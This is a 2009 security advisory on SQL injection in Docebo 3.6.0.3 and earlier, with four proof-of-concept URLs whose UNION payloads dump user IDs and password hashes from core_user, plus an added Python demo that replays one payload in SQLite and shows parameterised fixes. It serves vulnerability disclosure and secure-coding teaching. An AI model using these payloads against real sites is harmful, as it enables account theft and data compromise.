Docebo multiple vulnerabilities

SQL-Injection.

Posted by Andrea Fabrizi on October 22, 2009

Docebo <=3.6.0.3 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. The affected inputs shown below are the word parameter of the faq and link modules (doceboLms), which the application base64-decodes before use, and the id_certificate parameter of the certificate and meta_certificate modules (doceboCore), which is used as an unquoted number.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The proofs of concept below use a UNION to pull userid and pass values out of the core_user table.

POC 1

The word parameter is base64-decoded server-side, so the payload is encoded first. echo -n keeps the payload free of a trailing newline, and the quoted string ends with a space because MySQL only treats -- as a comment when it is followed by whitespace.

roland@hp6720s:~$ echo -n "' union select userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

POC 2

Same injection in the link module; the query there selects three columns, so the UNION is padded with a leading 1.

roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

POC 3

id_certificate is used as an unquoted number, so no closing quote is needed. concat(userid,0x3d,pass) returns userid=pass (0x3d is '='), the 2 and 3 pad the UNION to the three columns of the original SELECT, and limit 1,2 skips the first row and returns the next two, so the offset can be stepped to page through every account.

http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op=elemmetacertificate&id_certificate=3222 union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2

POC 4

Same injection in the certificate module.

http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123 union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
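The following is an added example, not part of the advisory and not Docebo's code. It rebuilds the two injection shapes used by POC 1-4 (a base64-decoded string spliced into a quoted LIKE pattern, and a numeric id concatenated unquoted) against an in-memory SQLite database, runs the page's own POC 1 payload through both, and shows the parameterised fix. Only the core_user table with its userid and pass columns is named on the page; the learning_faq and certificate tables, their columns and the sample rows are constructed assumptions, and the certificate payload is rewritten for SQLite (MySQL's concat(userid,0x3d,pass) becomes userid || '=' || pass, and the limit 1,2 paging is dropped).

```python
import base64
import sqlite3

# The exact encoded payload from POC 1 on this page.
POC1_WORD = "JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g"

# POC 3/4 payload adapted for SQLite (no concat() in older SQLite, so use ||;
# "limit 1,2" dropped so every row comes back in one request).
CERT_PAYLOAD = "3222 union select userid || '=' || pass, 2, 3 from core_user"


def build_db():
    """Constructed sample data; the rows are not real Docebo accounts."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE core_user (idst INTEGER PRIMARY KEY, userid TEXT, pass TEXT);
        INSERT INTO core_user VALUES (1, '/admin',   'hash-of-admin-password');
        INSERT INTO core_user VALUES (2, '/student', 'hash-of-student-password');
        CREATE TABLE learning_faq (question TEXT, answer TEXT);            -- assumed name
        INSERT INTO learning_faq VALUES ('How do I log in?', 'Use the login box.');
        CREATE TABLE certificate (id_certificate INTEGER, name TEXT, descr TEXT);  -- assumed
        INSERT INTO certificate VALUES (1, 'Course completion', 'default');
        """
    )
    return conn


def encode_word(payload: str) -> str:
    """Same as `echo -n "<payload>" | base64` on the page: no trailing newline."""
    return base64.b64encode(payload.encode()).decode()


def faq_search_vulnerable(conn, word_b64: str):
    """POC 1/2 shape: the decoded word is spliced into a quoted LIKE pattern."""
    word = base64.b64decode(word_b64).decode()
    sql = ("SELECT question, answer FROM learning_faq "
           "WHERE question LIKE '%" + word + "%'")   # string concatenation
    return conn.execute(sql).fetchall()


def faq_search_fixed(conn, word_b64: str):
    """Fix: bind the pattern as a parameter; the quote in the payload is just data."""
    word = base64.b64decode(word_b64).decode()
    sql = "SELECT question, answer FROM learning_faq WHERE question LIKE ?"
    return conn.execute(sql, ("%" + word + "%",)).fetchall()


def certificate_vulnerable(conn, id_certificate: str):
    """POC 3/4 shape: a numeric id concatenated unquoted, so no quote is needed."""
    sql = ("SELECT name, descr, id_certificate FROM certificate "
           "WHERE id_certificate = " + id_certificate)
    return conn.execute(sql).fetchall()


def certificate_fixed(conn, id_certificate: str):
    """Fix: cast to int first (anything that is not a number is rejected), then bind."""
    try:
        cid = int(id_certificate)
    except ValueError:
        return []
    sql = "SELECT name, descr, id_certificate FROM certificate WHERE id_certificate = ?"
    return conn.execute(sql, (cid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(encode_word("' union select userid,pass from core_user -- ") == POC1_WORD)
    print(faq_search_vulnerable(db, POC1_WORD))   # FAQ row plus every core_user row
    print(faq_search_fixed(db, POC1_WORD))        # no match: the payload is only text
    print(certificate_vulnerable(db, CERT_PAYLOAD))
    print(certificate_fixed(db, CERT_PAYLOAD))    # []: "3222 union ..." is not an int
```

Running it shows the vulnerable FAQ search returning the core_user rows alongside the one FAQ row, while the bound-parameter version returns nothing for the same encoded input; for the certificate lookup the int cast rejects the payload before any SQL is built. The fix is the same one Docebo needed here: bind values instead of concatenating them, and cast numeric ids before use.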

BID: http://www.securityfocus.com/bid/36654/info